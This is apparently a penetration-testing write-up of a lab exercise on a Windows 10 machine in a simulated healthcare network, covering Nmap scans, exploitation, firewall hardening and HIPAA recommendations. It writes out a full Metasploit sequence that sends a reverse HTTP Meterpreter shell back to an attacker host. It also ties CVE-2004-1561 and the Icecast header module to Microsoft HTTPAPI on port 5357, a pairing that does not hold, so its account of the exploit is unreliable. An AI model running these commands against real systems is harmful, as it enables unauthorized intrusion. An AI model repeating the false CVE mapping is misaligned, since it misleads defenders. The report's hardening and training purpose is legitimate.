This report documents a targeted VAPT simulation that exploited Microsoft HTTPAPI via port 5357 to assess system misconfigurations and apply mitigation through service hardening and firewall enforcement.
Healthcare infrastructures, often relying on legacy systems and misconfigured services, are increasingly vulnerable to low-effort exploitation. This project simulates an internal red team operation aimed at identifying and exploiting known vulnerabilities in a Windows 10 machine running insecure HTTPAPI-based services through port 5357.
The core of this engagement revolved around discovering the presence of UPnP/SSDP exposure via Microsoft HTTPAPI, mapping the service using Nmap, confirming its version and exploitability, and ultimately weaponizing the vulnerability CVE-2004–1561 using Metasploit. This attack demonstrates how seemingly harmless services — like those used for device discovery — can be leveraged for unauthorized access.
This report also focuses on enforcing system hardening measures by applying firewall rules and disabling insecure ports and services — thus closing the attack surface.
Target: Windows 10 Host — Healthcare Environment
Prepared by: Aditya Bhatt
Designation: VAPT Analyst | Cybersecurity Professional
Contact: [email protected] | +91–9818993884
This report documents a security assessment of a Windows 10 endpoint within a simulated healthcare environment. The VAPT focused on identifying misconfigured or exposed services — specifically the HTTPAPI httpd 2.0 service running on TCP port 5357, typically associated with SSDP/UPnP protocols.
Through network scanning and service enumeration, the system was found to be vulnerable to CVE-2004–1561 — a known flaw in the HTTP header parsing of the Microsoft HTTPAPI. The vulnerability was exploited using Metasploit’s icecast_header module with a reverse HTTP Meterpreter payload, granting shell access.
The service was later disabled, and custom firewall rules were applied to prevent further exploitation. The system was successfully hardened, verified by a follow-up port scan.
- Identify HIPAA compliance requirements as part of baseline regulatory understanding.
- Perform enumeration and vulnerability mapping on a Windows 10 machine.
- Exploit discovered HTTPAPI service using a known CVE.
- Harden the system by disabling insecure services and enforcing firewall rules.
Before technical assessment, HIPAA compliance standards were analyzed:
- Privacy Rule: Ensures PHI is accessed only with patient consent.
- Security Rule: Requires encryption, access controls, and audit mechanisms for ePHI.
- Breach Notification: Any breach of unsecured PHI must be reported to HHS.
- Enforcement Rule & Omnibus Rule: Defines penalties and extends compliance to third-party vendors.
- Target IP Identification
Command:
ipconfigOutput: IP Address of Windows host — 192.168.178.142
2. Live Host Discovery
nmap -sn 192.168.178.1/243. Identified active host: 192.168.178.142
4. Service Enumeration
nmap -sS 192.168.178.142 nmap -sV -p5357 192.168.178.1425. Detected: HTTPAPI httpd 2.0 on TCP port 5357
- Vulnerability: CVE-2004–1561
- Exploit Module:
exploit/windows/http/icecast_header - Payload:
windows/meterpreter/reverse_http
Metasploit Setup:
msfconsole
use exploit/windows/http/icecast_header
set payload windows/meterpreter/reverse_http
set RHOSTS 192.168.178.142
set RPORT 5357
set LHOST 192.168.178.137
exploitPost-exploit command:
sysinfoOutcome: Successfully obtained system details, confirming access via reverse shell.
Steps:
- Navigate to Windows Firewall → Advanced Settings
- Create custom inbound/outbound rules to block port
5357
- Disable UPnP-related services, if active
Re-run port scan:
nmap -sV -p5357 192.168.178.142Status: Port is now closed/filtered. No response from HTTPAPI service.
- TCP port 5357 exposed to LAN with vulnerable HTTPAPI service
- Vulnerability exploited successfully using Metasploit
- Legacy protocol (UPnP) remains active on healthcare system endpoints
- No firewall rules or monitoring in place at time of scan
1. Service Management
- Disable UPnP, SSDP, and HTTPAPI if not required
- Ensure only essential services are running
2. Patch Management
- Apply all security patches regularly
- Monitor for CVEs associated with system components
3. Firewall Configuration
- Apply deny-all by default
- Allow traffic only to known required ports/services
4. Network Segmentation
- Isolate legacy systems or medical endpoints from production networks
5. HIPAA Alignment
- Enforce access controls and breach reporting mechanisms
- Audit connected systems for PHI exposure
This assessment confirms that even default Windows services like HTTPAPI can be exploited with well-known CVEs when misconfigured and unpatched. Through Nmap, Metasploit, and proper verification, the attack vector was proven effective, and the mitigation strategy — firewall hardening and service disabling — successfully secured the machine.
This case highlights the critical need for continuous vulnerability monitoring, strict firewall configurations, and minimal exposure of services on internal networks — especially in regulated environments like healthcare.
This VAPT engagement served as a clear demonstration of how overlooked services like HTTPAPI and protocols such as UPnP can open serious attack surfaces within enterprise environments — especially in healthcare, where system uptime often takes precedence over security hygiene.
While the exploitation required minimal effort, mitigation demanded structured firewall policies, service-level auditing, and an understanding of risk beyond what’s visible. In the end, proactive hardening proved to be the most effective defense.
Security isn’t just about fixing vulnerabilities — it’s about building systems that expect to be targeted and are ready to withstand it.
Thank you for reading. Stay informed. Stay secure.